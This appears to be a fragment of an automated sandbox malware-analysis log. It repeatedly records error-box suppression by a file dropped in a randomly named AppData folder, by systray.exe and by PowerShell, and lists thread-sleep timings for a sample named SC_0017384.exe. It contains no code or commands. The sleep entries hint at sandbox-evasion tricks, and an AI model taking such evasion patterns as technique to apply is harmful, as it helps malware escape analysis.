          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -100000s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5980Thread sleep count: 2343 > 30
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99812s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99700s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99593s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99484s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99372s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99265s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99151s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99042s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -98916s >= -30000s
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5884Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -100000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 3856Thread sleep count: 2522 > 30
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99848s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99714s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99609s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99499s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99385s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99274s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99172s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99057s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -98953s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -98844s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 2248Thread sleep time: -922337203685477s >= -30000s
